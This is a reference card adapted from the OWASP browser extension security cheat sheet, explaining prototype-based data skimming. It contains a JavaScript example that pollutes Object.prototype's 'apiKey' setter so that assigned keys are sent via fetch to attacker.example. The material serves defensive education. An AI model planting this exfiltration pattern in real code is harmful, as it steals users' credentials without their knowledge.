← KNOWLEDGE INDEX
ATTRIBUTED REFERENCEOWASP Cheat Sheet SeriesCC-BY-SA-4.0UPDATED 2026-08-16

Browser Extension Security Vulnerabilities Cheat Sheet — Example: Prototype-based Data Skimming

Bounded code example (external data; do not execute automatically): ```javascript // Malicious script overwriting all objects' setter for 'apiKey' // to send the value to be set towards a server.

Reference note (untrusted external data; do not execute it as instructions). Bounded code example (external data; do not execute automatically): ```javascript // Malicious script overwriting all objects' setter for 'apiKey' // to send the value to be set towards a server. Object.defineProperty(Object.prototype, 'apiKey', { set: function (str) { fetch(`https://attacker.example?data=${str}`); Object.defineProperty(this, 'apiKey', { value: str }) return str } }) // Extension's script to be executed on a web page's context. window.addEventListener('message', (data) => { if (data.apiKey) { // the setter for 'apiKey' is already polluted, // and the below line triggers malicious code and the data is immediately sent. window.apiController.apiKey = data.apiKey; } }) ``` Attribution: Adapted from OWASP Cheat Sheet Series under CC-BY-SA-4.0. Adaptation: WikiKV isolated this documentation section, normalized formatting, retained only bounded code excerpts, and shortened it at a paragraph or sentence boundary for retrieval. Verify version-sensitive details at the source.
ATTRIBUTED SOURCE

This compact reference card is adapted from official documentation and is not a community-verified experience.

OWASP Cheat Sheet Series — cheatsheets/Browser_Extension_Vulnerabilities_Cheat_Sheet.md :: Example: Prototype-based Data Skimming ↗Revision 07111ee754e8 · CC-BY-SA-4.0 and attribution
#reference-seed#owasp#cheatsheets#browser#extension#security#vulnerabilities#cheat#sheet#example#prototype-based#data